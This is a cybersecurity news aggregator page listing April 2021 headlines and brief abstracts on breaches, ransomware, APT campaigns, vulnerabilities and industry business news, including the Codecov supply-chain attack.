Europol’s Serious Organized Crime Threat Assessment report 2021 summarizes the criminal threat of the last four years and provides insights into what to expect over the next four years.Security Week
April 20, 2021 – General
[eBook] Why Autonomous XDR Is Going to Replace NGAV/EDR Full Text
Abstract
For most organizations today, endpoint protection is the primary security concern. This is not unreasonable – endpoints tend to be the weakest points in an environment – but it also misses the forest for the trees. As threat surfaces expand, security professionals are harder pressed to detect threats that target other parts of an environment and can easily miss a real vulnerability by focusing too hard on endpoints. This is why pairing tools such as next-generation antivirus (NGAV) and endpoint detection and response (EDR) has become a popular, if flawed, choice. Fortunately, newer technologies and security methods offer much greater prevention and detection capabilities. This is the key argument of a new eBook ( download here ) offered by XDR provider Cynet. The eBook, titled Why Autonomous XDR is Going to Replace NGAV/EDR, starts with a look at how NGAV and EDR tools can defend an organization with the "assume breach" mentality – expecting a breach to occur and protecting endpoiThe Hacker News
April 20, 2021 – Malware
QR Code Malware Threat as Lockdown Ends Full Text
Abstract
Businesses urged to protect BYOD and corporate devicesInfosecurity Magazine
April 20, 2021 – Hacker
Watch out, hackers can take over your Cosori Smart Air Fryer Full Text
Abstract
Watch out, hackers could breach into your house by exploiting two remote code execution (RCE) vulnerabilities in the Cosori Smart Air Fryer. Security experts from Cisco Talos have found two remote code execution (RCE) vulnerabilities in the Cosori...Security Affairs
April 20, 2021 – General
‘Every day is game day:’ Sports psychology expert applies his skills to cybersecurity Full Text
Abstract
Derin McMains, a former professional ballplayer and peak performance coordinator for the MLB, provides guidance to ReliaQuest employees and executives on performing under pressure and staying resilient. As he told SC Media in an interview, “Pressure is a privilege… If you don’t feel pressure in what you do, it’s too easy or it doesn’t really matter to you. Who wants to do that?”SCMagazine
April 20, 2021 – Attack
Hundreds of networks reportedly hacked in Codecov supply-chain attack Full Text
Abstract
More details have emerged on the recent Codecov system breach which is being likened to the SolarWinds hack. In new reporting, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems.BleepingComputer
April 20, 2021 – General
What Are the Reasons Behind Health Data Breach Surge? Full Text
Abstract
About 70 major health data breaches have been added to the federal tally in the last four weeks as ransomware attacks have persisted and breaches at vendors have affected clients.Gov Info Security
April 20, 2021 – Breach
120 Compromised Ad Servers Target Millions of Internet Users Full Text
Abstract
An ongoing malvertising campaign tracked as "Tag Barnakle" has been behind the breach of more than 120 ad servers over the past year to sneakily inject code in an attempt to serve malicious advertisements that redirect users to rogue websites, thus exposing victims to scamware or malware. Unlike other operators who set about their task by infiltrating the ad-tech ecosystem using "convincing personas" to buy space on legitimate websites for running the malicious ads, Tag Barnakle is "able to bypass this initial hurdle completely by going straight for the jugular — mass compromise of ad serving infrastructure," said Confiant security researcher Eliya Stein in a Monday write-up. The development follows a year after the Tag Barnakle actor was found to have compromised nearly 60 ad servers in April 2020, with the infections primarily targeting an open-source advertising server called Revive. The latest slew of attacks is no different, although the adveThe Hacker News
April 20, 2021 – Outage
Campus Still Closed as Portsmouth University Reels from Suspected Ransomware Full Text
Abstract
Planned start to the new term is delayed after cyber-attackInfosecurity Magazine
April 20, 2021 – Vulnerabilities
WeChat users targeted by hackers using recently disclosed Chromium exploit Full Text
Abstract
Threat actors used the Chrome exploit publicly disclosed last week in attacks aimed at WeChat users in China, researchers warn. China-based firm Qingteng Cloud Security, reported that threat actors weaponized the recently disclosed Chrome exploit...Security Affairs
April 20, 2021 – Phishing
Spearphishing Campaign by Russian Espionage Group Gamaredon Infects Ukrainian Officials Full Text
Abstract
Russian hackers have a long history of going after organizations in Ukraine, but the Gamaredon group especially has tunnel vision for the former Soviet republic and its government officials.Cyberscoop
April 20, 2021 – Government
UK Government Reviews Nvidia-Arm Deal on National Security Fears Full Text
Abstract
Competition regulator will begin phase one investigationInfosecurity Magazine
April 20, 2021 – Business
Druva raises $147M to continue expansion of Druva Cloud Platform Full Text
Abstract
The fundraise was led by Caisse de dépôt et placement du Québec (CDPQ), a global investment group, with a significant investment by Neuberger Berman, each of which manage over $300 billion in assets.Help Net Security
April 20, 2021 – Vulnerabilities
WordPress 5.7.1 Patches XXE Flaw in PHP 8 Full Text
Abstract
WordPress has released version 5.7.1 of its popular content management system (CMS), which brings more than 25 bug fixes, including patches for two security vulnerabilities.Security Week
April 20, 2021 – Vulnerabilities
Geico Security Bug Lets Fraudsters Steal Customers’ Driver License Numbers for Months Full Text
Abstract
The insurance giant did not say how many customers were affected by the breach but said the fraudsters accessed customer driver’s license numbers between January 21 and March 1.TechCrunch
April 20, 2021 – Attack
Attackers Test Weak Passwords in Purple Fox Malware Attacks Full Text
Abstract
Weak passwords used over the Windows Server Message Block (SMB) protocol are often part of attacks that result in the spread of Purple Fox malware, Specops researchers report.Dark Reading
April 20, 2021 – General
1 in 2 Indian adults fell prey to hacking in last 12 months Full Text
Abstract
Seven in 10 Indian adults (among those surveyed) believed that remote work has made it much easier for hackers and cybercriminals to take advantage of them, a new report revealed on Monday.The Times Of India
April 20, 2021 – Hacker
Codecov hackers breached hundreds of restricted customer sites: sources Full Text
Abstract
The attackers used automation to rapidly copy customer credentials and raid additional resources, the investigators said, expanding the breach beyond the initial disclosure by Codecov on Thursday.Reuters
April 20, 2021 – Vulnerabilities
Coding error allowed attackers to delete Facebook live video Full Text
Abstract
On April 17, security researcher Ahmad Talahmeh published an advisory explaining how the vulnerability worked, together with Proof-of-Concept (PoC) code able to trigger an attack.ZDNet
April 20, 2021 – 5G
UK Government Unveils Plans to Speed Up Rollout of 5G Technology Full Text
Abstract
Under the proposals, it will be easier to introduced 5G-connected technology, particularly in countryside areas.Infosecurity Magazine
April 20, 2021 – Attack
Hundreds of customer networks hacked in Codecov supply-chain attack Full Text
Abstract
More details have emerged on the recent Codecov system breach which is being likened to the SolarWinds hack. Sources state hundreds of customer networks have been breached in the incident, expanding the scope of this system breach to beyond just Codecov's systems.BleepingComputer
April 20, 2021 – Hacker
North Korean hackers adapt web skimming for stealing Bitcoin Full Text
Abstract
Hackers linked with the North Korean government applied the web skimming technique to steal cryptocurrency in a previously undocumented campaign that started early last year, researchers say.BleepingComputer
April 20, 2021 – Criminals
Crooks stole driver’s license numbers from Geico auto insurer Full Text
Abstract
Car insurance provider Geico has suffered a data breach, attackers have stolen the driver's licenses for policyholders for several weeks. Geico, the second-largest auto insurer in the U.S., has suffered a data breach, threat actors exploited...Security Affairs
April 19, 2021 – APT
Lazarus APT Hackers are now using BMP images to hide RAT malware Full Text
Abstract
A spear-phishing attack operated by a North Korean threat actor targeting its southern counterpart has been found to conceal its malicious code within a bitmap (.BMP) image file to drop a remote access trojan (RAT) capable of stealing sensitive information. Attributing the attack to the Lazarus Group based on similarities to prior tactics adopted by the adversary, researchers from Malwarebytes said the phishing campaign started by distributing emails laced with a malicious document that it identified on April 13. "The actor has used a clever method to bypass security mechanisms in which it has embedded its malicious HTA file as a compressed zlib file within a PNG file that then has been decompressed during run time by converting itself to the BMP format," Malwarebytes researchers said . "The dropped payload was a loader that decoded and decrypted the second stage payload into memory. The second stage payload has the capability to receive and execute commandsThe Hacker News
April 19, 2021 – Ransomware
NitroRansomware Asks for $9.99 Discord Gift Codes, Steals Access Tokens Full Text
Abstract
The malware seems like a silly coding lark at first, but further exploration shows it can wreak serious damage in follow-on attacks.Threatpost
April 19, 2021 – Breach
Geico data breach exposed customers’ driver’s license numbers Full Text
Abstract
Car insurance provider Geico has suffered a data breach where threat actors stole the driver's licenses for policyholders for over a month.BleepingComputer
April 19, 2021 – APT
Iron Tiger APT Group Roars Louder With New Toolkit Full Text
Abstract
Iron Tiger threat actor group was spotted using an upgraded toolkit in an 18-month old cyberespionage campaign against a gambling firm in the Philippines.Cyware Alerts - Hacker News
April 19, 2021 – Government
Hillicon Valley: Apple approves Parler’s return to App Store | White House scales back response to SolarWinds, Microsoft incidents | Pressure mounts on DHS over relationship with Clearview AI Full Text
Abstract
Apple told Republicans it will welcome an updated version of Parler back into its App Store with approved content moderation changes. Meanwhile, the Biden administration announced it is scaling back its initial response to both the SolarWinds and Microsoft Exchange Server hacking incidents, and the Department of Homeland Security is coming under pressure to discontinue its relationship with Clearview AI.The Hill
April 19, 2021 – Business
Cloudflare Announces First Canadian Office Full Text
Abstract
American tech company’s plan to open new office in Toronto is welcomed by city’s mayorInfosecurity Magazine
April 19, 2021 – Government
No Server Left Behind: The Justice Department’s Novel Law Enforcement Operation to Protect Victims Full Text
Abstract
The U.S. Department of Justice recently announced that it undertook a law enforcement operation to remove malware from hundreds of victim systems in the United States. What’s the significance of the move?Lawfare
April 19, 2021 – Hacker
Experts demonstrated how to hack a utility and take over a smart meter Full Text
Abstract
Researchers from the FireEye’s Mandiant team have breached the network of a North American utility and turn off one of its smart meters. Over the years, the number of attacks against ICS/SCADA systems used by industrial organizations worldwide has rapidly...Security Affairs
April 19, 2021 – Government
White House closes SolarWinds, Microsoft Exchange focus groups, signaling return to normalcy Full Text
Abstract
The Biden administration’s handling of the two cyber incidents in coordination with industry leaves some in the community hopeful that a functioning interagency system will reemerge after years of atrophy.SCMagazine
April 19, 2021 – Malware
Google Alerts continues to be a hotbed of scams and malware Full Text
Abstract
Google Alerts continues to be a hotbed of scams and malware that threat actors are increasingly abusing to promote malicious websites.BleepingComputer
April 19, 2021 – Ransomware
ICS Computers Face Increased Ransomware Attacks - Kaspersky Report Full Text
Abstract
In a new report, Kaspersky noted that developed countries faced a large number of ransomware attacks on ICS systems during the pandemic owing to their consistency in keeping businesses up and running.Cyware Alerts - Hacker News
April 19, 2021 – Government
White House ‘standing down’ emergency response groups to SolarWinds, Microsoft hacks Full Text
Abstract
The Biden administration is “standing down” coordinated efforts by several key agencies to respond to recent major cybersecurity incidents including the SolarWinds hack, a senior administration official announced Monday.The Hill
April 19, 2021 – Business
Mastercard to Acquire Ekata Full Text
Abstract
Digital ID verification company to be acquired for $850mInfosecurity Magazine
April 19, 2021 – Criminals
Crooks made more than $560K with a simple clipboard hijacker Full Text
Abstract
Avast researchers analyzed the activity of a simple cryptocurrency malware dubbed HackBoss that allowed its operators to earn over $560K. While the value of major cryptocurrencies continues to increase, cybercriminals and malware authors focus their...Security Affairs
April 19, 2021 – Hacker
Chinese threat actors extract big data and sell it on the dark web Full Text
Abstract
The stolen data ranges from lottery and stock data to commercial databases of Canadian and U.S. businesses.SCMagazine
April 19, 2021 – Outage
Beverage Giant C&C Group Subsidiary Suffers IT Systems Outage Due to Security Incident Full Text
Abstract
Matthew Clark Bibendum (MCB), a distributor of alcoholic beverages and soft drinks in the UK and Ireland, says it’s working to restore IT systems following a cybersecurity incident.The Daily Swig
April 19, 2021 – Policy and Law
US Charges Nigerian with Elder Fraud Full Text
Abstract
Maryland resident accused of conning seniors out of nearly half a million dollars over social mediaInfosecurity Magazine
April 19, 2021 – Malware
XCSSET malware now targets macOS 11 and M1-based Macs Full Text
Abstract
XCSSET, a Mac malware targeting Xcode developers, was now re-engineered and employed in a campaign aimed at Apple's new M1 chips. Experts from Trend Micro have uncovered a Mac malware campaign targeting Xcode developers that employed a re-engineered...Security Affairs
April 19, 2021 – Botnet
Bad bot traffic reaching an all-time high over the past year Full Text
Abstract
There was a 372% increase in bad bot traffic on healthcare websites since September 2020. As vaccines became more widely available, bot activity was recorded at rates of 12,000 requests per hour.Help Net Security
April 19, 2021 – Ransomware
Ryuk Ransomware Anatomy of an Attack in 2021 Full Text
Abstract
Advintel observed actors conducting OSINT research related to the compromised host domain to identify the infected victim company and evaluate their revenue to assess what the ransom amount will be.Advanced Intelligence
April 19, 2021 – General
Payment transaction volume using 3-D Secure protocol grows globally Full Text
Abstract
RSA has published its latest quarterly fraud report, reinforcing the migration to more precise payment authentication methods and showing a notable spike in brand abuse attacks.Help Net Security
April 19, 2021 – Vulnerabilities
WordPress could treat Google FloC as a security issue Full Text
Abstract
The backlash against Google's Federated Learning of Cohorts (FLoC) has continued, with a proposal raised in WordPress Core to block the alternative identifier to third-party cookies by default.ZDNet
April 19, 2021 – Breach
Credit Card Data of Nearly 1 Million Domino’s Pizza India Customers Allegedly Sold Online Full Text
Abstract
A cybersecurity researcher claimed that credit card details of nearly 1 million people who purchased online on Domino's Pizza India, is allegedly being sold for around $550,000 on the dark web.The Times Of India
April 19, 2021 – General
Passwordless: More Mirage Than Reality Full Text
Abstract
The concept of "passwordless" authentication has been gaining significant industry and media attention. And for a good reason. Our digital lives are demanding an ever-increasing number of online accounts and services, with security best practices dictating that each requires a strong, unique password in order to ensure data stays safe. Who wouldn't want an easier way? That's the premise behind one-time passwords (OTP), biometrics, pin codes, and other authentication methods presented as passwordless security. Rather than remembering cumbersome passwords, users can authenticate themselves using something they own, know, or are. Some examples include a smartphone, OTP, hardware token, or biometric marker like a fingerprint. While this sounds appealing on the surface, the problem is that, when you dig deeper, these passwordless solutions are still reliant on passwords. This happens in two primary ways: Passwordless Solutions Rely on Passwords as a Fallback If you haThe Hacker News
April 19, 2021 – Business
Google Trumpets New Mobile App Security Standard Full Text
Abstract
Tech giant encourages developers to get on boardInfosecurity Magazine
April 19, 2021 – Business
OneTrust acquires Convercent to bring ethics and compliance technology into a single platform Full Text
Abstract
The acquisition of the ethics and compliance platform brings together privacy, data governance, GRC, third-party risk, ESG and ethics and compliance together into a single operational workflow.Help Net Security
April 19, 2021 – Malware
Malware That Spreads Via Xcode Projects Now Targeting Apple’s M1-based Macs Full Text
Abstract
A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET came into the spotlight in August 2020 after it was found to spread via modified Xcode IDE projects, which, upon the building, were configured to execute the payload. The malware repackages payload modules to imitate legitimate Mac apps, which are ultimately responsible for infecting local Xcode projects and injecting the main payload to execute when the compromised project builds. XCSSET modules come with the capabilities to steal credentials, capture screenshots, inject malicious JavaScript into websites, plunder user data from different apps, and even encrypt files for a ransom. Then in March 2021, Kaspersky researchers uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are activThe Hacker News
April 19, 2021 – Policy and Law
FIN7 Sysadmin Gets 10 Years Behind Bars Full Text
Abstract
Carbanak manager was recruited via Combi Security front companyInfosecurity Magazine
April 19, 2021 – Government
U.S. Takes Aim at Russia’s Cyber Ops Ecosystem Full Text
Abstract
Russian tech companies identified and sanctioned by the US Treasury Department include ERA Technopolis, Pasit AO, SVA, Neobit OOO, Advanced System Technology, and Pozitiv Teknolodzhiz.Security Boulevard
April 19, 2021 – General
Growing reliance on third-party suppliers signals increasing security risks Full Text
Abstract
Adversaries are turning their focus on cheaper, easier targets within an organization's supply chain, especially as businesses increasingly acquire software from external suppliers.ZDNet
April 19, 2021 – Criminals
Cybercriminals Claim to Sell 50GB of Data Exfiltrated from OTP-Generating Company Full Text
Abstract
Apart from OTP codes, other data included in the sale involved personally identifiable information (PII) such as SMS logs, mobile numbers, email addresses, SMPP details, customer documents, and more.Hackread
April 19, 2021 – Ransomware
Ransomware micro-criminals are still out here (and growing) Full Text
Abstract
The conventional ransomware operation model is still very active: victims keep receiving e-mails with malicious attachments that automatically execute the ransomware payload on the unlucky machine.Yoroi
April 19, 2021 – Breach
Major data breach at cleaning and catering company Spotless Full Text
Abstract
The potentially exposed data could have included the names, email addresses, phone numbers, and residential addresses as well as passport details and tax numbers of current and former employees.Stuff NZ
April 19, 2021 – Business
PlexTrac Raises $10 Million for Its Purple Teaming Platform Full Text
Abstract
PlexTrac last week announced closing a $10 million Series A funding round led by Noro-Moseley Partners and Madrona Venture Group, with participation from StageDotO Ventures.Security Week
April 19, 2021 – Phishing
Shady scam bots trick Omegle users into nonconsensual video sex recordings Full Text
Abstract
One way for scammers to make their bots more believable is by recording unknowing Omegle users doing things the scammer wants them to do and then using those recordings to target more users.Malwarebytes Labs
April 19, 2021 – Policy and Law
ICO Issued Over £42 Million in Fines Last Year Full Text
Abstract
Question marks remain over regulator’s ability to collectInfosecurity Magazine
April 19, 2021 – Malware
Nitroransomware demands gift codes as ransom payments Full Text
Abstract
A new ransomware dubbed 'NitroRansomware' has appeared in the threat landscape, it demands a Discord Nitro gift code to decrypt files. Researchers from BleepingComputer reported infections of a new singular ransomware dubbed NitroRansomware which...Security Affairs
April 19, 2021 – Malware
WhatsApp Pink is malware spreading through group chats Full Text
Abstract
An unusual baiting technique has appeared with the WhatsApp users receiving links, masked as an official update, that claim to turn the application’s theme from its trademark green to pink.Hackread
April 19, 2021 – Breach
Codecov was a victim of a supply chain attack Full Text
Abstract
The software company Codecov suffered a security breach, threat actors compromised the supply chain of one of its tools. A new supply chain attack made the headlines, the software company Codecov recently disclosed a major security breach after a threat...Security Affairs
April 19, 2021 – Ransomware
Not just ransomware: Schools and universities are increasingly targeted by impersonation scams Full Text
Abstract
School districts and universities, which were once seen as poor targets for financially motivated cybercrime attacks, are now awash in impersonation scams and other attacks.The Record
April 19, 2021 – Solution
Infection Monkey: Open source tool allows zero trust assessment of AWS environments Full Text
Abstract
Using this tool, security professionals can conduct zero trust assessments of AWS environments to help identify the potential gaps in an organization’s AWS security posture that can put data at risk.Help Net Security
April 19, 2021 – IOT
The parallels of pandemic response and IoT security Full Text
Abstract
Because complete isolation is not practical for most networks, network segments, and devices, perimeter controls are needed to limit who and what can get inside the network.Help Net Security
April 19, 2021 – Vulnerabilities
Google Project Zero testing 30-day grace period on bug details to boost user patching Full Text
Abstract
Google Project Zero will be shifting from a 90-day deadline to a new model that incorporates a new 30-day grace period to gives users time to install patches before technical details are revealed.ZDNet
April 18, 2021 – Vulnerabilities
WordPress to automatically disable Google FLoC on websites Full Text
Abstract
WordPress announced today that they plan on treating Google's new FLoC tracking technology as a security concern and plans to block it by default on WordPress sites.BleepingComputer
April 18, 2021 – Malware
Saint Bot Downloader - A New Cyberthreat in Making Full Text
Abstract
A previously undocumented malware downloader has been spotted in the wild leveraging phishing attacks to deploy credential stealers and other malicious payloads.Cyware Alerts - Hacker News
April 18, 2021 – Vulnerabilities
Monero Cryptocurrency campaign exploits ProxyLogon flaws Full Text
Abstract
Threat actors targeted are exploiting the ProxyLogon vulnerabilities in Microsoft Exchange servers to deploy Monero cryptocurrency miners. Sophos researchers reported that threat actors targeted Microsoft Exchange by exploiting ProxyLogon vulnerabilities...Security Affairs
April 18, 2021 – Ransomware
Discord Nitro gift codes now demanded as ransomware payments Full Text
Abstract
In a novel approach to ransom demands, a new ransomware calling itself 'NitroRansomware' encrypts victim's files and then demands a Discord Nitro gift code to decrypt files.BleepingComputer
April 18, 2021 – Government
Nation-State Attackers Taking Over Global Cyber Realm Full Text
Abstract
New research sheds light on cyberattack incidents by the nation-backed cybercriminal groups, revealing a 100% rise in nation-state incidents between 2017 and 2020.Cyware Alerts - Hacker News
April 18, 2021 – Policy and Law
A member of the FIN7 group was sentenced to 10 years in prison Full Text
Abstract
Fedir Hladyr (35), a Ukrainian national was sentenced today to 10 years in prison for his role in the financially motivated group FIN7, aka Carbanak. The Ukrainian national Fedir Hladyr (35), aka “das” or “AronaXus,” was sentenced to 10 years...Security Affairs
April 18, 2021 – Policy and Law
US sanctions cryptocurrency addresses linked to Russian cyberactivities Full Text
Abstract
The US government sanctioned this week twenty-eight cryptocurrency addresses allegedly associated with entities or individuals linked to Russian cyberattacks or election interference.BleepingComputer
April 18, 2021 – Breach
U.S. Investigators Are Reportedly Looking Into Codecov Breach Full Text
Abstract
U.S. federal investigators are purportedly looking into a security breach at Codecov, a platform used to test software code with more 29,000 customers worldwide, Reuters reported on Saturday.Gizmodo
April 18, 2021 – General
Security Affairs newsletter Round 310 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. Is the recent accident at Iran Natanz nuclear plant a cyber attack?Joker malware infected 538,000...Security Affairs
April 18, 2021 – Malware
Is BazarLoader malware linked to Trickbot operators? Full Text
Abstract
Experts warn of malware campaigns delivering the BazarLoader malware abusing popular collaboration tools like Slack and BaseCamp. Since January, researchers observed malware campaigns delivering the BazarLoader malware abusing popular collaboration...Security Affairs
April 17, 2021 – Vulnerabilities
Microsoft fixes Windows 10 bug that can corrupt NTFS drives Full Text
Abstract
Microsoft has fixed a bug that could allow a threat actor to create specially crafted downloads that crash Windows 10 simply by opening the folder where they are downloaded.BleepingComputer
April 17, 2021 – Vulnerabilities
Google Project Zero updates vulnerability disclosure policy moving to a “90+30” model Full Text
Abstract
Google Project Zero security team has updated its vulnerability disclosure policy, it gives users 30 days to patch flaws before disclosing associated technical details. The Google Project Zero security team announced an update to its vulnerability...Security Affairs
April 17, 2021 – Ransomware
Ryuk ransomware operation updates hacking techniques Full Text
Abstract
Recent attacks from Ryuk ransomware operators show that the actors have a new preference when it comes to gaining initial access to the victim network.BleepingComputer
April 17, 2021 – Government
6 out of 11 EU Agencies Running SolarWinds Orion Software Were Hacked Full Text
Abstract
European Commissioner for Budget and Administration Johannes Hahn confirmed the hack of some EU agencies as result of the SolarWinds supply chain attack in a response to a question filed by an EU Parliament member.Security Affairs
April 17, 2021 – Policy and Law
SysAdmin of Billion-Dollar Hacking Group Gets 10-Year Sentence Full Text
Abstract
A high-level manager and systems administrator associated with the FIN7 threat actor has been sentenced to 10 years in prison, the U.S. Department of Justice announced Friday. Fedir Hladyr , a 35-year-old Ukrainian national, is said to have played a crucial role in a criminal scheme that compromised tens of millions of debit and credit cards, in addition to aggregating the stolen information, supervising other members of the group, and maintaining the server infrastructure that FIN7 used to attack and control victims' machines. The development comes after Hladyr pleaded guilty to conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking in September 2019. He was arrested in Dresden, Germany, in 2018 and extradited to the U.S. city of Seattle. Hladyr has also been ordered to pay $2.5 million in restitution. "This criminal organization had more than 70 people organized into business units and teams. Some were hackers, others developed the malwaThe Hacker News
April 17, 2021 – Government
6 out of 11 EU agencies running Solarwinds Orion software were hacked Full Text
Abstract
SolarWinds supply chain attack also impacted six European Union institutions, European Commissioner for Budget and Administration confirmed. European Commissioner for Budget and Administration Johannes Hahn confirmed the hack of some EU agencies as result...Security Affairs
April 17, 2021 – Outage
Major BGP leak disrupts thousands of networks globally Full Text
Abstract
A large BGP routing leak that occurred last night disrupted the connectivity for thousands of major networks and websites around the world. Although the BGP routing leak occurred in Vodafone's autonomous network (AS55410) based in India, it has impacted U.S. companies, including Google, according to sources.BleepingComputer
April 17, 2021 – Government
‘Simple Photoshop’: how a Pakistani counterfeiter may have aided Russian trolls Full Text
Abstract
Amid the cascade of U.S. sanctions imposed on Russian cybersecurity companies and officials alleged to be operating on behalf of the Kremlin’s intelligence services, one company stood out: the Fresh Air Farm House in Karachi, Pakistan.Reuters
April 17, 2021 – Education
What are the different roles within cybersecurity? Full Text
Abstract
People talk about the cybersecurity job market like it's a monolith, but there are a number of different roles within cybersecurity, depending not only on your skill level and experience but on what you like to do. In fact, Cybercrime Magazine came up with a list of 50 cybersecurity job titles , while CyberSN, a recruiting organization, came up with its own list of 45 cybersecurity job categories . Similarly, OnGig.com, a company that helps firms write their job ads, analyzed 150 cybersecurity job titles and came up with its own top 30 list . This article is based on research I did with Springboard, one of the first cybersecurity bootcamps with a job guarantee and 1:1 mentorship. In particular, CyberSeek.org, a joint industry initiative looking at the cybersecurity job market, offers an interactive list of not only the various positions within cybersecurity but offers you a career path showing how you can get promoted. The complicated part is that these titles and rolesThe Hacker News
April 17, 2021 – Policy and Law
High-Level Admin of FIN7 Cybercrime Group Sentenced to 10 Years in Prison Full Text
Abstract
A high-level manager of cybercrime group FIN7, also known as the Carbanak Group and the Navigator Group, has been sentenced to ten years in prison, the Department of Justice reports.Dark Reading
April 17, 2021 – Vulnerabilities
Critical RCE can allow attackers to compromise Juniper Networks devices Full Text
Abstract
Juniper Networks addressed a critical vulnerability in Junos OS, tracked as CVE-2021-0254, that could allow an attacker to remotely hijack or disrupt affected devices. This flaw stems from the improper buffer size validation, which cSecurity Affairs
April 16, 2021 – Ransomware
The Week in Ransomware - April 16th 2021 - The Houston Rockets Full Text
Abstract
It has been a pretty quiet week with only a few large attacks disclosed and only a few new ransomware variants released. The highest-profile attack this week is the NBA's Houston Rockets who were transparent about their ransomware attack.BleepingComputer
April 16, 2021 – Malware
Is IcedID Banking Trojan on the Way to Becoming the Next Emotet? Full Text
Abstract
Security analysts observe a similarity between IcedID and Emotet campaigns while outlining the fact that when there was an ongoing effort to take down the latter the former was witnessing an upsurge.Cyware Alerts - Hacker News
April 16, 2021 – General
Hillicon Valley: Facebook Oversight board to rule on Trump ban in ‘coming weeks’ | Russia blocks Biden Cabinet officials in retaliation for sanctions Full Text
Abstract
The Hill
April 16, 2021 – Privacy
US Indicts SecondEye Operators Full Text
Abstract
Two charged over sale of thousands of false identity documents on dark netInfosecurity Magazine
April 16, 2021 – Vulnerabilities
Critical RCE can allow attackers to compromise Juniper Networks devices Full Text
Abstract
Cybersecurity provider Juniper Networks addressed a critical vulnerability that could be exploited by attackers to remotely hijack or disrupt vulnerable devices. Cybersecurity vendor Juniper Networks addressed a critical vulnerability in Junos OS, tracked...Security Affairs
April 16, 2021 – Breach
Will the CodeCov breach become the next big software supply chain hack? Full Text
Abstract
Knowing the identity of the group behind the attack would help shed light on their possible goals, but several observers said the length of time the attackers spent in Codecov’s network and the focus on credentials indicate that they were more interested in getting access to customers’ code than the company itself.SCMagazine
April 16, 2021 – Malware
BazarLoader Malware Abuses Slack, BaseCamp Clouds Full Text
Abstract
Two cyberattack campaigns are making the rounds using unique social-engineering techniques.Threatpost
April 16, 2021 – Vulnerabilities
Popular Codecov code coverage tool hacked to steal dev credentials Full Text
Abstract
Codecov online platform for hosted code testing reports and statistics announced on Thursday that a threat actor had modified its Bash Uploader script, exposing sensitive information in customers' continuous integration (CI) environment.BleepingComputer
April 16, 2021 – Ransomware
The Rise and Fall of Maze Cartel Full Text
Abstract
From being a lone warrior to becoming an influencer, the Maze group has carved its way to becoming one of the most infamous ransomware groups by establishing the first-ever cartel.Cyware Alerts - Hacker News
April 16, 2021 – Government
US Issues Russian SVR Warning Full Text
Abstract
America urges organizations to patch five vulnerabilities being exploited by Russia’s Foreign Intelligence ServiceInfosecurity Magazine
April 16, 2021 – APT
Russia-linked APT SVR actively targets these 5 flaws Full Text
Abstract
The US government warned that Russian cyber espionage group SVR is exploiting five known vulnerabilities in enterprise infrastructure products. The U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal...Security Affairs
April 16, 2021 – Vulnerabilities
Google won’t reveal technical details on patches for 30 days if vendors hit deadlines Full Text
Abstract
Researchers applauded the move, which Google’s Project Zero hopes will drive user patch adoption.SCMagazine
April 16, 2021 – Ransomware
How the Kremlin provides a safe harbor for ransomware Full Text
Abstract
A global epidemic of digital extortion known as ransomware is crippling local governments, hospitals, school districts, and businesses by scrambling their data files until they pay up. Law enforcement has been largely powerless to stop it.NBC News
April 16, 2021 – Business
Keyfactor to Merge with PrimeKey Full Text
Abstract
Deal marks first ever merger between certificate automation and certificate authority providersInfosecurity Magazine
April 16, 2021 – Business
Cyber nonprofits ask billionaire philanthropists to show them some love Full Text
Abstract
Cyber organizations are seeking funding from what they describe as the “entrepreneurs who made vast fortunes creating the very technologies that give rise to threats.”SCMagazine
April 16, 2021 – Covid-19
44 Organizations Targeted in Attacks Aimed at COVID-19 Vaccine Cold Chain Full Text
Abstract
More than 40 organizations have been targeted in a global campaign focused on the COVID-19 vaccine cold chain infrastructure, which handles the distribution of vaccines and their storage.Security Week
April 16, 2021 – Vulnerabilities
Mass Monitoring of Remote Workers Drives Shadow IT Risk Full Text
Abstract
Kaspersky study finds employees switching to less secure personal devicesInfosecurity Magazine
April 16, 2021 – Business
The Biggest Cybersecurity Funding Rounds in 2020 Full Text
Abstract
The lifeblood of the cybersecurity industry is new investments, both in startups and established companies. 272 vendors received additional funding in 2020 based on data published by Crunchbase. The total new investment for 2020 was $10.7 billion.Thansyn
April 16, 2021 – Vulnerabilities
Critical Vulnerability Can Allow Attackers to Hijack or Disrupt Juniper Devices Full Text
Abstract
A critical vulnerability patched recently by networking and cybersecurity solutions provider Juniper Networks could allow an attacker to remotely hijack or disrupt affected devices.Security Week
April 16, 2021 – Criminals
Cybercriminals Hacked into Codecov’s Bash Uploader Tool and Stole Customer Credentials for 2.5 Months Full Text
Abstract
Codecov said the breach occurred “because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.”The Record
April 16, 2021 – Vulnerabilities
Cockpit CMS flaws exposed web servers to NoSQL injection exploits Full Text
Abstract
The vulnerabilities could allow a remote, unauthenticated attacker to execute code on a server running Cockpit in some configurations, specifically limited to those running MongoLite.The Daily Swig
April 16, 2021 – Breach
Over 5,000 Individuals Affected in Security Breach at Melbourne-based Swinburne University Full Text
Abstract
Swinburne University said that the leaked data, including personal information on staff, students, and external parties, was event registration information from multiple events from 2013 onwards.ZDNet
April 16, 2021 – General
2021 and Emerging Cybersecurity Threats Full Text
Abstract
Instead of coming to a standstill, if anything, 2020 saw an increase in cybersecurity threats as criminals found new ways to take advantage of vulnerabilities and infiltrate business systems.Hackread
April 16, 2021 – Policy and Law
Bank Groups Object to Proposed Breach Notification Regulation Full Text
Abstract
The American Bankers Association and three other groups have voiced objections to provisions in a cyber incident notification regulation for banks proposed by three federal agencies.Gov Info Security
April 16, 2021 – Vulnerabilities
Google to Delay Publishing Bug Details for 30 Days Full Text
Abstract
New strategy designed to mitigate opportunistic attacksInfosecurity Magazine
April 16, 2021 – Malware
Hackers Used 100,000 Google Sites to Install SolarMarket RAT on Victims Device Full Text
Abstract
Several professionals who had searched the internet for professional forms such as invoices, questionnaires, and receipts were lured into downloading a RAT...Cyber Security News
April 16, 2021 – Hacker
Lazarus E-Commerce Attackers Also Targeted Cryptocurrency Full Text
Abstract
